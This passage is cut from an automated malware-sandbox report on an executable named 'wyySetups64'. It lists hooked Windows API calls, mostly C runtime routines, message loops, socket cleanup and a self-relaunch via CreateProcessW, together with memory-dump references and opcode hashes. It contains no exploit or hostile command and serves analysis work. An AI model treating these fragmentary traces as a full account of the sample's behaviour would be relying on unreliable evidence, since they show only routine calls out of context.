                                                                                                                                                                                                                • Part of subcall function 0337F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F6B8
                                                                                                                                                                                                              • _free.LIBCMT ref: 03380F0C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1020059152-0
                                                                                                                                                                                                              • Opcode ID: 41d2c1a8ab06d6917a1259b34eedc51943b327b0711bc89430cc7b23c504c52c
                                                                                                                                                                                                              • Instruction ID: 8fe0d3e78385fbfa9a5b5c82aea27a2e281c8d28a53c752b4be24a953218a309
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41d2c1a8ab06d6917a1259b34eedc51943b327b0711bc89430cc7b23c504c52c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD112336C08B19BECB3ABF74ECC465E379DAF412A0F148626E8599F150DB34C5448B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00BD2BFF
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BD2C15
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00BD2C24
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00BD2C2A
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BD2C38
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2015114452-0
                                                                                                                                                                                                              • Opcode ID: 799aacc1ad443176db6d8a8c453d33a2030d6803707a7f1a45efddbe2c486bc0
                                                                                                                                                                                                              • Instruction ID: 3d9d3de8751a758254bbecee0a08674235ab95d71e95178cc684a8b3e6ee9351
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 799aacc1ad443176db6d8a8c453d33a2030d6803707a7f1a45efddbe2c486bc0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0018672A5024976E6209B989C81FBAB3ACEB14B10F504557FB04FB1D4EEA1E80187A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03372C3F
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03372C55
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 03372C64
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 03372C6A
                                                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03372C78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2015114452-0
                                                                                                                                                                                                              • Opcode ID: 1710e669c91f5a2baef8377aa2fa504138ff750bc5bdaa54d4658093bcde7e6a
                                                                                                                                                                                                              • Instruction ID: f467f9f6d90a4280e77d64a42737b62c936bdffb224097b6ab6f0742ad1c0b51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1710e669c91f5a2baef8377aa2fa504138ff750bc5bdaa54d4658093bcde7e6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9018672A5030EB6F620E7949CC1FFB736CEB18B10F504912FB00EA0C5D6AAA40187A5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B63
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B6D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B80
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00BD4B83
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              • Opcode ID: f09b311bd8dcab5382a5d1908b03cffe25bd37165df5d47bd4fd2a59ca74cc74
                                                                                                                                                                                                              • Instruction ID: ec530ac8b24464e7631b9d2ea3033c6be193fe749c7050baafcf9cdbb8e572db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f09b311bd8dcab5382a5d1908b03cffe25bd37165df5d47bd4fd2a59ca74cc74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23014F766006549FD721DB39FCC4B9BB7E8EB88328F01496AF24687611D774EC458AA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03374B83
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03374B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03374BA0
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03374BA3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              • Opcode ID: bb3f370ef161a945d97dab10588b238cee3d0acbeb0505817b1a23fc927d4a70
                                                                                                                                                                                                              • Instruction ID: ebb4dca030a89388760457921f04981a87c8d56fd8080af6c7433ba811a72e25
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb3f370ef161a945d97dab10588b238cee3d0acbeb0505817b1a23fc927d4a70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C0184766006189BD720EB36FCC4B5BB7ECEB88714F054859E186C7204C739FC45CA60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00B336A2
                                                                                                                                                                                                                • Part of subcall function 00B33232: __getptd.LIBCMT ref: 00B33240
                                                                                                                                                                                                                • Part of subcall function 00B33232: __getptd.LIBCMT ref: 00B3324E
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336AC
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __getptd_noexit.LIBCMT ref: 00B298E9
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __amsg_exit.LIBCMT ref: 00B298F6
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336BA
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336C8
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B336D3
                                                                                                                                                                                                                • Part of subcall function 00B332D7: __CallSettingFrame@12.LIBCMT ref: 00B33323
                                                                                                                                                                                                                • Part of subcall function 00B337A0: __getptd.LIBCMT ref: 00B337AF
                                                                                                                                                                                                                • Part of subcall function 00B337A0: __getptd.LIBCMT ref: 00B337BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3282538202-0
                                                                                                                                                                                                              • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                                                              • Instruction ID: fb8dd8efc4703a0361061b3721196f581e7acf3bf51752c446b219f6de530c4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A111D7B1C00209DFDB00EFA4D945AAE7BF0FF08314F1485A9F858AB252DB389A559F50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03372D5C
                                                                                                                                                                                                              • CancelIo.KERNEL32(?), ref: 03372D66
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03372D6F
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 03372D79
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000001), ref: 03372D83
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1486965892-0
                                                                                                                                                                                                              • Opcode ID: ba676cb59a6543ba68ca56fb16bb5344c56a3d7a7e837ec16107930ac6f7a10f
                                                                                                                                                                                                              • Instruction ID: a2e6d8aaa8899fb2c9f5fb13ea23818941e328889f11a039bbae89d595db7860
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba676cb59a6543ba68ca56fb16bb5344c56a3d7a7e837ec16107930ac6f7a10f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF03C76100B08FBD234AF54DD89F6777BCFB49B11F100A1DF696D6684C6B5B5088BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BDE14B
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BDE162
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00BDE170
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BDE180
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00BDE194
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: aeacecc2d4bc766ab969d51d959cac02458c5a14ac40567c9b1395467646c10f
                                                                                                                                                                                                              • Instruction ID: 81318539126f4d389007404bd3037b0c2253b06ec081ca36cb10d5bfc900def8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aeacecc2d4bc766ab969d51d959cac02458c5a14ac40567c9b1395467646c10f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F06D32A446209BE721BBA8980375DB2E0AF00B20F1481DBF5647F3D2EF748901CA55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03385012
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03385029
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 03385037
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03385047
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0338505B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: 8fec391927bf72aa658254b36fa26631926a950090b611162a4361cce9eb1b79
                                                                                                                                                                                                              • Instruction ID: 771267a818e9edcbfe7faefd50dfdad87135e071a235b3b89c88d5afe9e722f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fec391927bf72aa658254b36fa26631926a950090b611162a4361cce9eb1b79
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F0B43AD05701DBF760FB68A8C2B8D73A4AF01B25F14424DD5556F2D0CB7855418A96
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032049D1
                                                                                                                                                                                                                • Part of subcall function 0320381A: __getptd_noexit.LIBCMT ref: 0320381D
                                                                                                                                                                                                                • Part of subcall function 0320381A: __amsg_exit.LIBCMT ref: 0320382A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032049E8
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 032049F6
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03204A06
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 03204A1A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                                                              • Instruction ID: 67858a27ff262d3ba124acdfd74db23f6c8ea10c829880244c91bd8e5399485e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F0243A925314CAE724FB699801B4E33A0AF04720F14C24CD744AF2D3CFB418C9CE49
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B2E122
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __getptd_noexit.LIBCMT ref: 00B298E9
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __amsg_exit.LIBCMT ref: 00B298F6
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B2E139
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00B2E147
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00B2E157
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00B2E16B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                                                              • Instruction ID: d7603fe8b7a46f16d9b6167b6a4f8e1de1369a1bc1b3443aa90ce81e071e0df8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F090329046309BEB21FBA9B80375D32E0AF00761F1841D9F56C7B2D3CB74D851DA56
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0337C932
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 0337C938
                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 0337C947
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0337C96F
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0337C977
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3421218197-0
                                                                                                                                                                                                              • Opcode ID: 6e4e98850fd934e19492cb9f06c813e7be2ae75dfd8f179e6acbd9dbed3b93e2
                                                                                                                                                                                                              • Instruction ID: 126680ff90e3ba4a21bc5299759fb75e863b18f95845a4e5e560ddf1f74a66fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e4e98850fd934e19492cb9f06c813e7be2ae75dfd8f179e6acbd9dbed3b93e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF06D3158431CFBEB20ABA0DC8DFEB777CEB04B00F100695B619EA0D4DA716A44CB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 033775D2
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 033775D8
                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 033775E7
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0337760F
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 03377617
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3421218197-0
                                                                                                                                                                                                              • Opcode ID: c393eda97510eb12d2f30ab71bbdf1a551510e076f91c0e53bfbc25742ccd659
                                                                                                                                                                                                              • Instruction ID: 7c9f38c6c582d54bcc7714c277582e79e6b9d561521a3d8719f83bdd4ff6d125
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c393eda97510eb12d2f30ab71bbdf1a551510e076f91c0e53bfbc25742ccd659
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16F0907158531DFBE720ABA0DC8DFEA777CEB04B00F100695B619EA0C4D6716A44CB54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD82F0: _doexit.LIBCMT ref: 00BD82FC
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00BD71BC
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsGetValue.KERNEL32(00000000,00BD98AD,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000), ref: 00BD975D
                                                                                                                                                                                                                • Part of subcall function 00BD9754: DecodePointer.KERNEL32(?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA,0000000D), ref: 00BD976F
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsSetValue.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD977E
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00BD71C7
                                                                                                                                                                                                                • Part of subcall function 00BD9734: TlsGetValue.KERNEL32(?,?,00BD71CC,00000000), ref: 00BD9742
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00BD71DA
                                                                                                                                                                                                                • Part of subcall function 00BD9788: DecodePointer.KERNEL32(?,?,?,00BD71DF,00000000,?,00000000), ref: 00BD9799
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00BD71E3
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD71EA
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD71F0
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 00BD7210
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 781180411-0
                                                                                                                                                                                                              • Opcode ID: 93a54f288456e49b4520536564fa631ed42b5905714dc7c49ec03ff63d776f0c
                                                                                                                                                                                                              • Instruction ID: c0e9f263b0d3d614b41fe37277ee6b4403125670ffd5ef22aa018926f4b7d49a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93a54f288456e49b4520536564fa631ed42b5905714dc7c49ec03ff63d776f0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2E0463691564A6B8F103BB18D4E8DEFAED9D41358F000882FA20A7202FF289C0186A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03381CD0: _doexit.LIBCMT ref: 03381CDC
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0337F9CA
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsGetValue.KERNEL32(00000000,03383DF9,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000), ref: 03383CA9
                                                                                                                                                                                                                • Part of subcall function 03383CA0: DecodePointer.KERNEL32(?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06,0000000D), ref: 03383CBB
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsSetValue.KERNEL32(00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06), ref: 03383CCA
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 0337F9D5
                                                                                                                                                                                                                • Part of subcall function 03383C80: TlsGetValue.KERNEL32(?,?,0337F9DA,00000000), ref: 03383C8E
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 0337F9E8
                                                                                                                                                                                                                • Part of subcall function 03383CD4: DecodePointer.KERNEL32(?,?,?,0337F9ED,00000000,?,00000000), ref: 03383CE5
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 0337F9F1
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0337F9F8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337F9FE
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 0337FA1E
                                                                                                                                                                                                              Memory Dump Source
